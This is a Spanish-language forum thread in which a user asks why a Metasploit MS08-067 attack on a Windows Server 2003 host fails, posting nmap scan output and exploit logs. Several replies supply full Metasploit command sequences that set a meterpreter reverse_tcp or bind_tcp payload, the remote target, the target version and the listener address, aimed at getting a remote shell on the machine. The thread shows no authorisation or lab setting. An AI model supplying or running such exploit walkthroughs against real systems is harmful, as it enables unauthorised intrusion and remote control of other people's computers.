Saludos a todos estoy intentando hacer una penetacion a un servidor con WS 2003 y el "famoso exploit " ms08_067_netapi no me funciona para nada aun teniendo el servidor el puerto 445 abierto , a continiacion el resultado del nmap
nmap -sS -sV -O 172.19.45.0
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-11-12 06:47 EST
Nmap scan report for pgajpl (172.19.45.0)
Host is up (0.0010s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
2701/tcp open cmrcservice Microsoft Configuration Manager Remote Control service (CmRcService.exe)
3389/tcp open ms-wbt-server Microsoft Terminal Service
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows XP SP2 or Windows Server 2003 SP1 or SP2
Network Distance: 4 hops
Service Info: OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_server_2003
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds
Y este es el resultado del exploit:
msf exploit(ms08_067_netapi) > exploit
- Started reverse handler on 172.19.45.77:4444
- Automatically detecting the target...
- Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
- We could not detect the language pack, defaulting to English
- Selected Target: Windows 2003 SP2 English (NX)
- Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) >
Si alguien me pudiera orientar acerca de que pueda estar pasando si es que el exploit esta desactualzado o algo se los agradeceria gracias antemano colegas.
Manda una captura de pantalla o las opciones que le estás metiendo al exploit. Tal vez no lo tengas bien configurado o te falte por meter el payload
Cita de: juanvelasco en 1 Diciembre 2015, 18:41 PMManda una captura de pantalla o las opciones que le estás metiendo al exploit. Tal vez no lo tengas bien configurado o te falte por meter el payload
No se supone que al lanzar "exploit" y genera un resultado positivo/negativo es porque selecciono el payload?
Esa "vulnerabilidad" esta más que parchada, solo funciona en entornos controlados.
Buenas!
Efectivamente, el problema que tienes es que seguramente no hayas configurado el payload.
Prueba esto:
> use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set rhost 172.19.45.0
> set lport 445 (esto realmente no es necesario ya que debería venir por defecto)
> exploit
Saludos ;)
Saludos amigos no creo que el problema sea por no configurar el payload ya que lo tengo bien configurado
> use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/reverse_tcp
> set rhost 172.19.45.0
> set lport 445
> exploit
estoy usando la configuracion que mas se utiliza por lo que pude ver, pero ami no me funciona tambien use la configuracion que dijo un companero que me respondio a qui en el foro y nada yo pienso que ese exploit ya esta inservible.
Cita de: ElLoboHack en 22 Enero 2016, 07:43 AM
... yo pienso que ese exploit ya esta inservible.
Piensas bien. Estás usando un exploit del 2008 en el 2015... :P
Saludos!
Bueno ya estamos en el 2016 así que es más inservible todavía :laugh:
Si te fijas el Payload está configurado para servidores que posean como lenguaje Inglés, por lo cual modificando el idioma (si es que el exploit dispone de tal configuración) por otro podría funcionar el exploit.
Saludos
Que tal compas buen dia !!
este error se debe a que debes configurar el target, el error que mandas te indica que lo configures y seria asi:
> use exploit/windows/smb/ms08_067_netapi
> set rhost xx.xx.xx.xx (ip victima)
> show targets (aqui te aparece una lista de todos los tipos de targets(versiones windows) que es compitble el exploit selecciona el que te indica metasploit que es Windows 2003 SP2 English (NX) o la version a que corresponde el windows victima)
> set target Windows 2003 SP2 English (NX)
> set payload windows/meterpreter/reverse_tcp
> set lhost xx.xx.xx.xx (tu ip)
> exploit
eso deberia funcionar